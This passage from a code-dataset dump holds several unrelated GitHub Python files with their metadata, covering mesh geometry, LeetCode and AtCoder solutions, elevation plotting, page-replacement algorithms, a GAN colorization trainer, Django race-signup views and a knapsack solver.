field_per_vertex\n\ndef distribute_scalar_field(num_vertices, f, per_face_scalar_field, avg=False):\n \"\"\"\n computes a scalar field per vertex by summing / averaging the incident face scalar field\n :param num_vertices: number of vertices in the mesh\n :param f: faces of the mesh\n :param per_face_scalar_field: scalar field of size F\n :param avg: if True, the field is averaged over the incident faces instead of summed up\n :return: scalar field of size V\n \"\"\"\n device = f.device\n incident_face_areas = torch.zeros([num_vertices, 1], device=device)\n f_unrolled = f.flatten()\n face_indices_repeated_per_vertex = torch.arange(f.shape[0], device=f.device)\n face_indices_repeated_per_vertex = torch.repeat_interleave(face_indices_repeated_per_vertex, repeats=3)\n face_areas_repeated_per_face = per_face_scalar_field[face_indices_repeated_per_vertex].unsqueeze(-1)\n incident_face_areas = torch.index_add(incident_face_areas, dim=0, index=f_unrolled,\n source=face_areas_repeated_per_face)\n if avg:\n neighbors = torch.index_add(torch.zeros_like(incident_face_areas), dim=0, index=f_unrolled,\n source=torch.ones_like(face_areas_repeated_per_face))\n incident_face_areas = incident_face_areas / neighbors\n return incident_face_areas\n\ndef distribute_vector_field(num_vertices, f, per_face_vector_field):\n \"\"\"\n computes a vector field per vertex by summing the incident face vector field\n :param num_vertices: number of vertices in the mesh\n :param f: faces of the mesh\n :param per_face_vector_field: vector field of size Fx3\n :return: vector field of size Vx3\n \"\"\"\n device = f.device\n incident_face_areas = torch.zeros([num_vertices, 1], device=device)\n f_unrolled = f.flatten()\n face_indices_repeated_per_vertex = torch.arange(f.shape[0], device=f.device)\n face_indices_repeated_per_vertex = torch.repeat_interleave(face_indices_repeated_per_vertex, repeats=3)\n normals_repeated_per_face = per_face_vector_field[face_indices_repeated_per_vertex]\n normals_repeated_per_face = normals_repeated_per_face\n incident_face_vectors = torch.zeros([num_vertices,per_face_vector_field.shape[-1]], device=device)\n incident_face_vectors = 
torch.index_add(incident_face_vectors, dim=0, index=f_unrolled,\n source=normals_repeated_per_face)\n return incident_face_vectors","repo_name":"yoterel/gsoup","sub_path":"src/gsoup/geometry_advanced.py","file_name":"geometry_advanced.py","file_ext":"py","file_size_in_byte":7598,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"}
+{"seq_id":"40512750845","text":"from ListToListnode import FuckListnode\n\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n\n def sortedListToBST(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: TreeNode\n \"\"\"\n nodes = []\n while head:\n nodes.append(head.val)\n head = head.next\n return self.finddescendants(nodes)\n\n def finddescendants(self, nodes):\n if nodes:\n div = len(nodes) // 2\n head = TreeNode(nodes[div])\n head.left = self.finddescendants(nodes[:div])\n head.right = self.finddescendants(nodes[div + 1:])\n return head\n else:\n return None\n\n\nif __name__ == '__main__':\n a = [-10,-3,0,5,9]\n s = Solution()\n f = FuckListnode()\n a = f.returnNode(a)\n ans = s.sortedListToBST(a)\n print(ans)\n","repo_name":"mcclee/leetcode","sub_path":"109_sortedListToBST.py","file_name":"109_sortedListToBST.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"14519670901","text":"\"\"\"Plot the elevation of the Tuebingen surrounding.\"\"\"\nimport os\nimport shutil\nimport urllib.request\nfrom typing import Iterable, List, Tuple\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport rasterio\nfrom matplotlib import cm\n\n\ndef download_data() -> str:\n \"\"\"Download elevation model data and return the raster file.\n\n Skips download if file already exists.\n\n The data comes from the SRTM Digital Surface Model of Germany. See\n https://opendem.info/download_srtm.html.\n\n Returns:\n Path to raster file.\n \"\"\"\n HERE = os.path.abspath(__file__)\n HEREDIR = os.path.dirname(HERE)\n # global\n # xmin, xmax = 5.0, 16.0\n # ymin, ymax = 47.0, 56.0\n filename = \"srtm_germany_dsm\"\n tif_filename = os.path.join(HEREDIR, f\"{filename}.tif\")\n\n if os.path.exists(tif_filename):\n print(\"Data already downloaded. Skipping.\")\n else:\n zip_source = f\"https://opendem.info/downloads/{filename}.zip\"\n zip_target = os.path.join(HEREDIR, f\"{filename}.zip\")\n zip_target_dir = os.path.dirname(zip_target)\n\n # download\n print(\"Downloading data\")\n urllib.request.urlretrieve(zip_source, zip_target)\n\n # extract\n print(\"Extracting data\")\n shutil.unpack_archive(zip_target, extract_dir=zip_target_dir)\n\n return tif_filename\n\n\ndef elevations(data_file: str, *coords: Iterable[Tuple[float, float]]) -> List[int]:\n \"\"\"Yield elevations for the requested coordinates using the data file.\n\n Args:\n data_file: Path to the TIF file that contains the elevation model.\n coords: Pairs of (x, y) coordinates\n\n Returns:\n List of elevations for the supplied coordinates.\n \"\"\"\n with rasterio.open(data_file) as src:\n vals = src.sample(coords)\n return [val[0] for val in vals]\n\n\nsrc_file = download_data()\n\n\n# to identify these values, click on a place in google maps, then look them up\n# in the link\ntue_center = (8.9735997, 48.4890488)\ntue_center_elevation = elevations(src_file, tue_center)[0]\nmpi = (9.0584233, 48.5341389)\nmpi_elevation = elevations(src_file, mpi)[0]\nmvl6 = (9.0515339, 48.5382876)\nmvl6_elevation = elevations(src_file, mvl6)[0]\n\nxmin, xmax = 9.042815, 9.091223\nymin, ymax = 48.514583, 48.545057\n\nsteps = 100\nxs = np.linspace(xmin, xmax, steps)\nys = np.linspace(ymin, ymax, steps)\nzs = np.zeros((steps, steps))\n\nxy_idx = []\ncoords = []\n\nfor x_idx, x_coord in enumerate(xs):\n for y_idx, y_coord in enumerate(ys):\n xy_idx.append((x_idx, y_idx))\n coords.append((x_coord, y_coord))\n\nfor (x_idx, y_idx), elevation in zip(xy_idx, elevations(src_file, *coords)):\n zs[y_idx, x_idx] = elevation\n\nfig, ax = plt.subplots(subplot_kw={\"projection\": \"3d\"})\n\nxs_mesh, ys_mesh = np.meshgrid(xs, ys)\nsurf = ax.plot_surface(\n xs_mesh, ys_mesh, zs, cmap=cm.coolwarm, linewidth=0, antialiased=True\n)\nfig.colorbar(surf)\nplt.show()\n","repo_name":"NurEinJemand/tueopt","sub_path":"tueopt/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"}
+{"seq_id":"5333078621","text":"'''\n Author: Todimu Jenrola\n File name: pageReplacement.py\n Date created: 12/03/2021\n Date last modified: 26/03/2021\n Python Version: 3.6\n'''\n\ndef belady(frames, stream):\n frame = [None]*frames # initailize frame\n previous = []\n j = 0\n\n for i in range(len(stream)):\n # user_input = input(\"\")\n # # handle user exit\n # if user_input == \"\":\n # print(\"All done, goodbye!\")\n # break\n\n # handle the first time when frame is pre-populated\n if j < frames:\n # print number + NF if no page fault\n if not isFault(stream[i], frame):\n print(stream[i] + \"NF\")\n \n # print fault since frame is empty\n elif isFault(stream[i], frame):\n print(stream[i] + \"F\")\n frame[j] = stream[i] # add user input to frame\n\n else:\n # print number + NF if no page fault\n if not isFault(stream[i], frame):\n print(stream[i] + \"NF\")\n \n # obtain element to evict, insert new value\n elif isFault(stream[i], frame):\n if position(frame) < frames:\n frame.pop(position(frame))\n frame.insert(position(frame), stream[i])\n print(stream[i] + \"F\")\n\n # perform cyclic shift operation\n else:\n index = predict(frame, stream[j:])\n evicted = frame[index]\n frame.pop(index)\n frame.insert(index, stream[i])\n print(stream[i] + \"F\" + \" E\" + evicted)\n \n previous.append(stream[i])\n \n print(frame) # check frame for debugging purposes\n\n j += 1\n\n # print(\"This is the BELADY algorithm with {} frames.\".format(frames))\n \n\ndef clock(frames):\n frame = [None]*frames\n cache = {}\n j = 0\n previous = []\n temp = 0\n\n while True:\n user_input = input(\"\")\n # handle user exit\n if user_input == \"\":\n print(\"All done, goodbye!\")\n break\n\n # handle the first time when frame is pre-populated\n if j < frames:\n # print number + NF if no page fault\n if not isFault(user_input, frame):\n cache[user_input] = 0\n print(user_input + \"NF\")\n \n # print fault since frame is empty\n elif isFault(user_input, frame):\n cache[user_input] = 1\n print(user_input + \"F\")\n\n temp += 1\n frame[j] = user_input # add user input to frame\n\n else:\n # print number + NF if no page fault\n if not isFault(user_input, frame):\n cache[user_input] = 0\n print(user_input + \"NF\")\n \n # obtain element to evict, insert new value\n elif isFault(user_input, frame):\n if position(frame) < frames:\n frame.pop(position(frame))\n frame.insert(position(frame), user_input)\n cache[user_input] = 1\n print(user_input + \"F\")\n\n else:\n check = []\n\n for item in frame:\n if cache[item] == 1:\n check.append(True)\n else:\n check.append(False)\n # list(my_dict.keys())[0]\n \n if all(check):\n cache = reset(cache)\n\n evicted = frame[0]\n frame.pop(0)\n frame.insert(0, user_input)\n cache[user_input] = 1\n print(user_input + \"F\" + \" E\" + evicted)\n\n else:\n evicted = frame.pop(temp%frames)\n frame.insert((temp%frames), user_input)\n cache[user_input] = 1\n print(user_input + \"F\" + \" E\" + str(evicted))\n\n temp += 1\n\n previous.append(user_input)\n \n print(frame) # check for debugging purposes\n\n j += 1\n\n # print(\"This is the CLOCK algorithm with {} frames.\".format(frames))\n\n\ndef fifo(frames):\n frame = [None]*frames # initailize frame\n temp = 0 # variable for performing cyclic iteration\n j = 0\n\n while True:\n user_input = input(\"\")\n # handle user exit\n if user_input == \"\":\n print(\"All done, goodbye!\")\n break\n\n # handle the first time when frame is pre-populated\n if j < frames:\n # print number + NF if no page fault\n if not isFault(user_input, frame):\n 
print(user_input + \"NF\")\n \n # pop appropriate index, insert to frame and print value if page fault\n elif isFault(user_input, frame):\n evicted = frame.pop(temp%frames)\n frame.insert((temp%frames), user_input)\n print(user_input + \"F\")\n\n temp += 1\n frame[j] = user_input # add user input to frame\n\n else:\n # print number + NF if no page fault\n if not isFault(user_input, frame):\n print(user_input + \"NF\")\n \n # pop appropriate index, insert to frame and print value if page fault\n elif isFault(user_input, frame):\n if position(frame) < frames:\n frame.pop(position(frame))\n frame.insert(position(frame), user_input)\n print(user_input + \"F\")\n\n else:\n evicted = frame.pop(temp%frames)\n frame.insert((temp%frames), user_input)\n print(user_input + \"F\" + \" E\" + evicted)\n \n temp += 1\n \n print(frame) # check frame for debugging purposes\n \n j += 1\n \n # print(\"This is the FIFO algorithm with {} frames.\".format(frames))\n\n\ndef lru(frames):\n frame = [None]*frames # initailize frame\n previous = []\n j = 0\n\n while True:\n user_input = input(\"\")\n # handle user exit\n if user_input == \"\":\n print(\"All done, goodbye!\")\n break\n\n # handle the first time when frame is pre-populated\n if j < frames:\n # print number + NF if no page fault\n if not isFault(user_input, frame):\n print(user_input + \"NF\")\n \n # print fault since frame is empty\n elif isFault(user_input, frame):\n print(user_input + \"F\")\n frame[j] = user_input # add user input to frame\n\n else:\n # print number + NF if no page fault\n if not isFault(user_input, frame):\n print(user_input + \"NF\")\n \n # obtain element to evict, insert new value\n elif isFault(user_input, frame):\n if position(frame) < frames:\n frame.pop(position(frame))\n frame.insert(position(frame), user_input)\n print(user_input + \"F\")\n\n else:\n cache = []\n k = 1\n\n # handle when least recently used position is greater then number of frames\n while len(set(cache)) != frames:\n cache.append(previous[-(k)])\n k += 1\n\n evicted = cache[-1]\n index = frame.index(evicted)\n frame.pop(index)\n frame.insert(index, user_input)\n print(user_input + \"F\" + \" E\" + evicted)\n \n previous.append(user_input)\n \n print(frame) # check frame for debugging purposes\n\n j += 1\n\n # print(\"This is the LRU algorithm with {} frames.\".format(frames))\n \n# method to check if frame is full\ndef position(frame):\n i = 0\n for entry in range(len(frame)):\n if frame[entry] == None:\n break\n i += 1\n\n return i \n\n# method to get input stream\ndef getStream():\n stream = []\n\n while True:\n user_input = input(\"\")\n if user_input == \"\":\n break\n stream.append(user_input)\n\n return stream\n\n# method to check if there is a fault\ndef isFault(frame, stream):\n\n return frame not in stream\n\n# method to reset cache\ndef reset(cache):\n for item in cache:\n cache[item] = 0\n \n return cache\n\ndef evict(frame, cache, previous):\n evicted, index = 0, 0\n\n for item in frame:\n if cache[item] == 0:\n evicted = item\n index = frame.index(item)\n\n return evicted, index\n\n\n# method to predict unused page\ndef predict(frame, stream):\n evicted = []\n for i in range(len(frame)):\n if frame[i] not in stream:\n return frame.index(frame[i])\n \n index = stream.index(frame[i])\n evicted.append(index)\n \n return frame.index(stream[max(evicted)])\n\n\nif __name__ == \"__main__\":\n\n# Example: FIFO 3, press enter and input frame entries.\n\n\n while True:\n prompt = print(\"Input algorithm type (BELADY, CLOCK, FIFO, LRU) and number of 
frames: \\n\")\n algorithms = [belady, clock, lru, fifo]\n selection = input(\"\")\n select = selection.split(\" \")\n\n if selection == \"\":\n print(\"Here endeth the program!\")\n break\n \n if algorithms[0].__name__ == str(select[0]).lower():\n stream = getStream()\n algorithms[0](int(select[1]), stream)\n\n else:\n for i in range(1,4):\n if algorithms[i].__name__ == str(select[0]).lower():\n algorithms[i](int(select[1]))\n \n print(\"\\n\")\n\n","repo_name":"TodimuJ/Python","sub_path":"pageReplacement.py","file_name":"pageReplacement.py","file_ext":"py","file_size_in_byte":9955,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"11282134847","text":"# ABC157e\n\n\n#print(bin(toBitSet([1, 2, 3, 2])))\n\n# for i in range(97, 123):\n# print(chr(i))\n\n\ndef main():\n import sys\n sys.setrecursionlimit(10**6)\n # 再帰関数を使わない限りPypyで出すこと\n\n class SegmentTree:\n #####単位元######\n ide_ele = 0\n\n # num:n以上の最小の2のべき乗\n\n def segfunc(self, x, y):\n return x | y # 例としてmin関数を設定\n\n def __init__(self, n):\n super().__init__()\n self.num = 2**(n-1).bit_length() # nは元々の配列の長さ\n self.seg = [self.ide_ele]*(2*self.num+1)\n\n def init(self, init_val): # セグ木にしたい配列を渡す\n # set_val\n for i in range(len(init_val)):\n self.seg[i+self.num-1] = init_val[i]\n # built\n for i in range(self.num-2, -1, -1):\n self.seg[i] = self.segfunc(self.seg[2*i+1], self.seg[2*i+2])\n\n def update(self, k, x):\n k += self.num-1\n self.seg[k] = x\n while k:\n k = (k-1)//2\n self.seg[k] = self.segfunc(self.seg[k*2+1], self.seg[k*2+2])\n\n def query(self, p, q):\n if q <= p:\n return ide_ele\n p += self.num-1\n q += self.num-2\n res = self.ide_ele\n while q-p > 1:\n if p & 1 == 0:\n res = self.segfunc(res, self.seg[p])\n if q & 1 == 1:\n res = self.segfunc(res, self.seg[q])\n q -= 1\n p = p//2\n q = (q-1)//2\n if p == q:\n res = self.segfunc(res, self.seg[p])\n else:\n res = self.segfunc(self.segfunc(res, self.seg[p]), self.seg[q])\n return res\n\n n = int(input())\n s = list(input())\n q = int(input())\n\n def toBitSet(numberSet):\n theSet = 0\n for i in numberSet:\n theSet = theSet | 1 << i\n return theSet\n\n def alphabetToZeroIndexed(alphabet):\n return ord(alphabet) - 97\n\n tree = SegmentTree(n)\n\n for i in range(n):\n tree.update(i+1, toBitSet([alphabetToZeroIndexed(s[i])]))\n\n for _ in range(q):\n a, b, c = input().split()\n b = int(b)\n if int(a) == 1:\n tree.update(b, toBitSet([alphabetToZeroIndexed(c)]))\n else:\n c = int(c)\n print(bin(tree.query(b, c+1)).count('1'))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yuto-moriizumi/AtCoder","sub_path":"ABC157/ABC157e.py","file_name":"ABC157e.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"18154719011","text":"#### SUNEEL ####\n# NOTE: unfinished/ untested #\n\nimport os\nimport traceback\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torchvision import transforms\nimport numpy as np\n\nfrom ImagesFolder import TrainFolder\nfrom gan import Generator, Discriminator\nhave_cuda = torch.cuda.is_available()\nepochs = 3\n\noriginal_transform = transforms.Compose([\n #transforms.ToTensor(),\n transforms.RandomCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]),\n \n])\n\n\ntransform = transforms.Compose(\n [\n transforms.RandomCrop(224),\n transforms.RandomHorizontalFlip(),\n #transforms.ToTensor(),\n #transforms.Lambda(lambda img:print(img))\n #transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n])\n\ng_iters = 10\nd_iters = 10\n\ncolor_dir = \"train\"#/train\"\ngray_dir = \"grayscale\"#/train\"\ntrain_set = TrainFolder(color_dir,transform )\ntrain_set_size = len(train_set)\ntrain_loader = torch.utils.data.DataLoader(train_set, batch_size=32, shuffle=True, num_workers=4)\n\nG = Generator()\nD = Discriminator()\n\ngParams = 'gan_g_params.pkl'\ndParams = 'gan_d_params.pkl'\n\nif os.path.exists(gParams):\n G.load_state_dict(torch.load(gParams))\n\nif os.path.exists(dParams):\n D.load_state_dict(torch.load(dParams))\n\n#load cuda\nif have_cuda:\n G.cuda()\n D.cuda()\n\n\n# Binary cross entropy loss and optimizer\ncriterion = nn.BCELoss()\nd_optimizer = torch.optim.Adam(D.parameters(), lr=0.0003)\ng_optimizer = torch.optim.Adam(G.parameters(), lr=0.0003)\n\n\ndef to_var(x):\n if torch.cuda.is_available():\n x = x.cuda()\n return Variable(x)\n\n\ndef gan_train(epoch):\n G.train()\n D.train()\n try:\n for i, (images, classes) in enumerate(train_loader):\n # Build mini-batch dataset\n batch_size = images[0].size(0)\n\n messagefile = open('./message.txt', 'a')\n bw_image = images[0].unsqueeze(1).float()\n ab_image = images[1].float()\n\n bw_image = to_var(bw_image)\n ab_image = to_var(ab_image)\n classes = to_var(classes)\n\n # Create the labels which are later used as input for the BCE loss\n real_labels = to_var(torch.ones(batch_size))\n fake_labels = to_var(torch.zeros(batch_size))\n\n #============= Train the discriminator =============#\n # Compute BCE_Loss using real images where BCE_Loss(x, y): - y * log(D(x)) - (1-y) * log(1 - D(x))\n # Second term of the loss is always zero since real_labels == 1\n outputs = D(ab_image)\n d_loss_real = criterion(outputs, real_labels)\n real_score = outputs\n \n # Compute BCELoss using fake images\n # First term of the loss is always zero since fake_labels == 0\n # z = to_var(torch.randn(batch_size, 64))\n fake_images = G(bw_image)\n outputs = D(fake_images)\n d_loss_fake = criterion(outputs, fake_labels)\n fake_score = outputs\n\n # n = np.array(outputs.size(), dtype='int64')\n # # print n.dtype\n # ems_loss = torch.pow((ab_image - outputs), 2).sum() / torch.from_numpy(n).prod()\n # loss = ems_loss\n # lossmsg = 'loss: %.9f\\n' % (loss.data[0])\n # messagefile.write(lossmsg)\n # ems_loss.backward(retain_variables=True)\n\n # Backprop + Optimize\n d_loss = d_loss_real + d_loss_fake\n D.zero_grad()\n d_loss.backward()\n d_optimizer.step()\n \n #=============== Train the generator ===============#\n # Compute loss with fake images\n # z = to_var(torch.randn(batch_size, 64))\n fake_images = G(bw_image) #again, consider removing\n outputs = D(fake_images)\n \n # We 
train G to maximize log(D(G(z)) instead of minimizing log(1-D(G(z)))\n # For the reason, see the last paragraph of section 3. https://arxiv.org/pdf/1406.2661.pdf\n g_loss = criterion(outputs, real_labels)\n \n # Backprop + Optimize\n D.zero_grad()\n G.zero_grad()\n g_loss.backward()\n g_optimizer.step()\n \n #output every 10 batches\n if (i+1) % 10 == 0 or i == 0:\n print('Epoch [%d/%d], Step[%d/%d], d_loss: %.4f, '\n 'g_loss: %.4f, D(x): %.2f, D(G(z)): %.2f' \n %(epoch, epochs, i+1, len(train_loader), d_loss.data[0], g_loss.data[0],\n real_score.data.mean(), fake_score.data.mean()))\n torch.save(G.state_dict(), gParams)\n torch.save(D.state_dict(), dParams)\n \n # Save real images\n # if (epoch+1) == 1:\n # images = images.view(images.size(0), 1, 28, 28)\n # save_image(denorm(images.data), './data/real_images.png')\n \n # Save sampled images\n # fake_images = fake_images.view(fake_images.size(0), 1, 28, 28)\n # save_image(denorm(fake_images.data), './data/fake_images-%d.png' %(epoch+1))\n except Exception:\n logfile = open('log.txt', 'w')\n logfile.write(traceback.format_exc())\n logfile.close()\n finally:\n # Save the trained parameters \n torch.save(G.state_dict(), gParams)\n torch.save(D.state_dict(), dParams)\n\n\n\nfor epoch in range(1, epochs + 1):\n gan_train(epoch)\n","repo_name":"patrickrchao/Image-Colorization","sub_path":"gan_train.py","file_name":"gan_train.py","file_ext":"py","file_size_in_byte":5591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"36672272722","text":"from unittest import TestCase as UnitTestTestCase\nfrom delfick_error import DelfickErrorTestMixin\nfrom contextlib import contextmanager\nimport tempfile\nimport shutil\nimport os\n\n@contextmanager\ndef a_file(contents=None, removed=False):\n location = None\n try:\n location = tempfile.NamedTemporaryFile(delete=False).name\n if contents:\n with open(location, 'w') as fle:\n fle.write(contents)\n if removed:\n os.remove(location)\n yield location\n finally:\n if location and os.path.exists(location):\n os.remove(location)\n\n@contextmanager\ndef a_directory(removed=False):\n location = None\n try:\n location = tempfile.mkdtemp()\n if removed:\n shutil.rmtree(location)\n yield location\n finally:\n if location and os.path.exists(location):\n shutil.rmtree(location)\n\nclass TestCase(UnitTestTestCase, DelfickErrorTestMixin):\n def assertSortedEqual(self, listone, listtwo):\n self.assertEqual(sorted(listone), sorted(listtwo))\n\n","repo_name":"realestate-com-au/iam_syncr","sub_path":"tests/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"}
+{"seq_id":"40262241733","text":"# coding=utf-8\n\"\"\"\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n ------------------------------------------------------\n File Name : ${NAME}\n Author : jiaqi.hjq\n\"\"\"\nimport logging\nimport traceback\nfrom datetime import datetime\n\nLOGGER = logging.getLogger(__name__)\nimport json\n\nfrom django.views.generic.edit import ProcessFormView\nfrom django.http import JsonResponse, HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404\n\nfrom django.views.generic import TemplateView\nfrom django.views.generic.detail import BaseDetailView\nfrom django.views.generic.list import BaseListView\n\nfrom .models.competition import Competition\nfrom .models.racer import RacerLog, Team, RacerInfo\n\n\nclass IndexView(TemplateView):\n template_name = \"index.html\"\n\n\nclass JsonViewMixin:\n def render_to_response(self, context, **response_kwargs):\n obj = context['object']\n return JsonResponse({'object': obj}, **response_kwargs)\n\n\nclass JsonListViewMixin:\n def render_to_response(self, context, **response_kwargs):\n objname = self.get_context_object_name(context[\"object_list\"])\n objs = context[objname]\n\n return JsonResponse({objname: list(objs)}, **response_kwargs)\n\n\nclass CompetitionListView(JsonListViewMixin, BaseListView):\n context_object_name = 'competitions'\n ordering = [\"-startDate\", \"-endDate\"]\n\n def get_queryset(self):\n qs = Competition.objects.select_related('serialId')\n qs = qs.filter(signUpOpen=True) if self.request.GET.get(\"showOpen\", False) == \"true\" else qs.all()\n return qs.values()\n\n\nclass CompetitionGroupListView(JsonListViewMixin, BaseListView):\n context_object_name = 'groups'\n\n def get_queryset(self):\n # obj = get_object_or_404(Competition, uniname=self.kwargs['competition_uniname'])\n return RacerLog.objects.select_related('competitionId__uniname', 'racerId__realName', 'racerId__gender',\n 'racerId__region', 'teamId__name').filter(\n competitionId__uniname=self.kwargs['competition_uniname']).values('group', 'racerTag', 'racerId__realName',\n 'racerId__gender', 'racerId__region',\n 'teamId__name')\n\n\nclass CompetitionDetailView(JsonViewMixin, BaseDetailView):\n # competition_fields = get_model_all_fields_names(Competition)\n\n def get_object(self, queryset=None):\n # print(self.competition_fields)\n qs = Competition.objects.select_related('serialId__name').values('serialId__name', 'name', 'location',\n 'description', 'groupSetting',\n 'startDate', 'endDate', 'signUpOpen',\n 'uniname', 'signUpFee', 'signUpStartDate',\n 'signUpEndDate', 'manager')\n return get_object_or_404(qs, uniname=self.kwargs['competition_uniname'])\n\n\nclass CompetitionSignupView(JsonViewMixin, ProcessFormView):\n success_url = \"signup_success.html\"\n\n def post(self, request, *args, **kwargs):\n request.META[\"CSRF_COOKIE_USED\"] = True\n\n obj = json.loads(request.body.decode('utf-8'))\n try:\n succ, msg = self.validate(obj)\n if succ:\n self.save_object(obj)\n obj = {\"success\": succ, \"message\": msg}\n except Exception as 
e:\n LOGGER.error(traceback.format_exc())\n obj = {\"success\": False, \"message\": str(e)}\n return self.render_to_response({\"object\": obj})\n\n def save_object(self, obj):\n qs = RacerInfo.objects.all()\n try:\n idtype = 0 if obj[\"region\"] == \"CHN\" else 1\n racer = qs.get(idType=idtype, idNumber=obj[\"idNumber\"], realName=obj[\"realName\"])\n # allow update some info\n racer.region = obj[\"region\"]\n racer.phoneNumber = obj[\"phoneNumber\"]\n racer.ecpName = obj[\"ecpName\"]\n racer.ecpNumber = obj[\"ecpNumber\"]\n except RacerInfo.DoesNotExist:\n # idtype is not posted here. check region instead.\n racer = RacerInfo(realName=obj[\"realName\"], gender=obj[\"gender\"], birthday=obj[\"birthday\"],\n region=obj[\"region\"], idType=idtype, idNumber=obj[\"idNumber\"],\n phoneNumber=obj[\"phoneNumber\"], ecpName=obj[\"ecpName\"], ecpNumber=obj[\"ecpNumber\"])\n racer.save()\n\n qs = Team.objects.all()\n if obj[\"teamId\"] == \"NEW\":\n try:\n team = qs.get(name=obj[\"teamName\"])\n except Team.DoesNotExist:\n team = Team(name=obj[\"teamName\"], leaderName=obj[\"teamLeader\"], leaderPhone=obj[\"teamLeaderPhone\"])\n else:\n team = qs.get(id=obj[\"teamId\"])\n team.save()\n\n comp = self.get_comp(uniname=self.kwargs['competition_uniname'])\n if RacerLog.objects.all().filter(racerId=racer, competitionId=comp).exists():\n return\n racerlog = RacerLog(racerId=racer, competitionId=comp, teamId=team, group=obj[\"group\"])\n racerlog.save()\n\n def validate(self, obj):\n for k, v in obj.items():\n obj[k] = str(v).strip()\n\n if not self._is_phone_number(obj[\"phoneNumber\"]):\n return False, \"请填写正确的号码\"\n\n obj[\"birthday\"] = datetime.strptime(obj[\"birthday\"].split(\"T\")[0], \"%Y-%m-%d\")\n\n # check_racer_number\n comp = self.get_comp(uniname=self.kwargs['competition_uniname'])\n if obj[\"group\"] not in [s.strip() for s in comp.groupSetting.strip().split(',')]:\n return False, \"请选择正确的分组\".format(comp.manager)\n if not comp.signUpOpen:\n return False, \"报名已关闭,请联系管理员!{}\".format(comp.manager)\n if RacerLog.objects.filter(\n competitionId__uniname=self.kwargs['competition_uniname']).count() >= comp.maxRacerCount:\n return False, \"报名人数已到上限,请联系管理员!{}\".format(comp.manager)\n\n return True, \"\"\n\n def get_comp(self, **kwargs):\n return Competition.objects.all().get(**kwargs)\n\n def _is_phone_number(self, number: str):\n try:\n number = number.replace('-', '')\n if number.startswith('+'):\n number = number[1:]\n return number.isdigit() and len(number) >= 11\n except:\n return False\n\n def get_success_url(self, context):\n return self.request.path + \"success/\"\n\n\nclass TeamListView(JsonListViewMixin, BaseListView):\n context_object_name = 'teams'\n\n def get_queryset(self):\n return Team.objects.all().values('id', 'name', 'leaderName')\n\n\nclass CompetitionSignupSuccessView(TemplateView):\n template_name = \"signup_success.html\"\n","repo_name":"wanderxjtu/enduro-racer","sub_path":"enduro_racer/race/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7537,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"26193358988","text":"import unittest\nimport numpy as np\n\n\nclass Solution:\n def knapsack_01(self, items, w_max):\n\n b = [0 for w in range(w_max + 1)]\n\n # list of knapsacks\n knapsack_list = [set() for w in range(w_max + 1)]\n\n # loop k from 1 to n\n for item in list(items.items()):\n\n # item: [item_name, [weight, benefit]]\n item_name = item[0]\n\n w_k = item[1][0]\n\n b_k = item[1][1]\n\n # loop in reverse to access b[k-1] and b[k-1, w - w_k] before overwriting\n # loop w from w_max to w_k (if w < w_k do nothing)\n for w in range(w_max, w_k - 1, -1):\n\n x = b[w - w_k] + b_k\n\n if x > b[w]:\n # item is worth putting in\n b[w] = x\n\n # add item to knapsack entry\n knapsack_list[w] = knapsack_list[w - w_k] ^ set({item_name})\n\n print(b)\n print(knapsack_list)\n\n return knapsack_list[w_max]\n\n\nclass TestSolution(unittest.TestCase):\n def test_1(self):\n\n # \"item\": [weight, benefit]\n s = {\"a\": [2, 3], \"b\": [4, 5], \"c\": [5, 8], \"d\": [3, 4], \"e\": [9, 10]}\n\n w_max = 20\n knapsack = {\"a\", \"b\", \"c\", \"e\"}\n knapsack_w_max = Solution().knapsack_01(s, w_max)\n self.assertSetEqual(knapsack_w_max, knapsack)\n\n def test_2(self):\n\n s = {\n \"a\": [12, 4],\n \"b\": [10, 6],\n \"c\": [8, 5],\n \"d\": [11, 7],\n \"e\": [14, 3],\n \"f\": [7, 1],\n \"g\": [9, 6],\n }\n w_max = 18\n knapsack = {\"b\", \"c\"}\n knapsack_w_max = Solution().knapsack_01(s, w_max)\n self.assertSetEqual(knapsack_w_max, knapsack)\n\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"Wet1988/ds-algo","sub_path":"algorithms/knapsack_01.py","file_name":"knapsack_01.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
